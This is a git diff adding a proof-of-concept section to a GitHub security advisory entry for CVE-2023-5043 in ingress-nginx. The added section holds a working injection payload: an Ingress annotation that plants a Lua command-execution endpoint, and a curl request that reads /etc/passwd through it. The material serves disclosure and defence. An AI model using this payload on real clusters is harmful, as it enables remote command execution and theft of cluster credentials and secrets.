github · r0binak · Jan 15, 2024
diff --git a/advisories/github-reviewed/2023/10/GHSA-5wj4-wffq-3378/GHSA-5wj4-wffq-3378.json b/advisories/github-reviewed/2023/10/GHSA-5wj4-wffq-3378/GHSA-5wj4-wffq-3378.json
@@ -1,13 +1,13 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-5wj4-wffq-3378",
-  "modified": "2023-11-03T19:13:55Z",
+  "modified": "2023-11-03T19:13:56Z",
   "published": "2023-10-25T21:30:33Z",
   "aliases": [
     "CVE-2023-5043"
   ],
   "summary": "Ingress nginx annotation injection causes arbitrary command execution",
-  "details": "### Issue Details\nA security issue was identified in ingress-nginx where the nginx.ingress.kubernetes.io/configuration-snippet annotation on an Ingress object (in the networking.k8s.io or extensions API group) can be used to inject arbitrary commands, and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.\n\nThis issue has been rated High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L), and assigned CVE-2023-5043.\n\n### Affected Components and Configurations\nThis bug affects ingress-nginx. If you do not have ingress-nginx installed on your cluster, you are not affected. You can check this by running kubectl get po -n ingress-nginx.\n\nIf you are running the “chrooted” ingress-nginx controller introduced in v1.2.0 (gcr.io/k8s-staging-ingress-nginx/controller-chroot), command execution is possible but credential extraction is not, so the High severity does not apply.\n\nMulti-tenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue.\n\n#### Affected Versions\n<v1.9.0\n#### Versions allowing mitigation\nv1.9.0\n### Mitigation\nIngress Administrators should set the --enable-annotation-validation flag to enforce restrictions on the contents of ingress-nginx annotation fields.\n\n### Detection\nIf you find evidence that this vulnerability has been exploited, please contact [email protected]\n\n### Additional Details\nSee ingress-nginx Issue [#10571](https://github.com/kubernetes/ingress-nginx/issues/10571) for more details.\n\n### Acknowledgements\nThis vulnerability was reported by suanve\n\nThank You,\nCJ Cullen on behalf of the Kubernetes Security Response Committee",
+  "details": "### Issue Details\nA security issue was identified in ingress-nginx where the nginx.ingress.kubernetes.io/configuration-snippet annotation on an Ingress object (in the networking.k8s.io or extensions API group) can be used to inject arbitrary commands, and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.\n\nThis issue has been rated High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L), and assigned CVE-2023-5043.\n\n### Affected Components and Configurations\nThis bug affects ingress-nginx. If you do not have ingress-nginx installed on your cluster, you are not affected. You can check this by running kubectl get po -n ingress-nginx.\n\nIf you are running the “chrooted” ingress-nginx controller introduced in v1.2.0 (gcr.io/k8s-staging-ingress-nginx/controller-chroot), command execution is possible but credential extraction is not, so the High severity does not apply.\n\nMulti-tenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue.\n\n#### Affected Versions\n<v1.9.0\n#### Versions allowing mitigation\nv1.9.0\n\n### PoC\n\n1. Create Ingress (can be created without Service and Pod)\n```yaml\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n  name: ingress-exploit\n  annotations:\n    kubernetes.io/ingress.class: \"nginx\"\n    nginx.ingress.kubernetes.io/configuration-snippet: |\n      more_set_headers \"robinak\"\n            proxy_pass http://upstream_balancer;\n                                proxy_redirect                          off;\n        }\n        location /robinak/ { content_by_lua_block { local rsfile = io.popen(ngx.req.get_headers()[\"cmd\"]);local rschar = rsfile:read(\"*all\");ngx.say(rschar); } } location /fs/{\nspec:\n  rules:\n  - host: robinak.me\n    http:\n      paths:\n      - path: /\n        pathType: Prefix\n        backend:\n          service:\n            name: exploit\n            port:\n              number: 80\n```\n2. Make request by specifying the public address of your Ingress NGINX controller:\n```bash\ncurl -v -H 'Host: robinak.me' -H \"cmd: cat /etc/passwd\" http://IP/robinak/\n```\n3. Got RCE\n![image](https://user-images.githubusercontent.com/80983900/296797549-1dc1f87b-5399-4125-beb3-5344ee2c3223.png)\n\n### Mitigation\nIngress Administrators should set the --enable-annotation-validation flag to enforce restrictions on the contents of ingress-nginx annotation fields.\n\n### Detection\nIf you find evidence that this vulnerability has been exploited, please contact [email protected]\n\n### Additional Details\nSee ingress-nginx Issue [#10571](https://github.com/kubernetes/ingress-nginx/issues/10571) for more details.\n\n### Acknowledgements\nThis vulnerability was reported by suanve\n\nThank You,\nCJ Cullen on behalf of the Kubernetes Security Response Committee",
   "severity": [
     {
       "type": "CVSS_V3",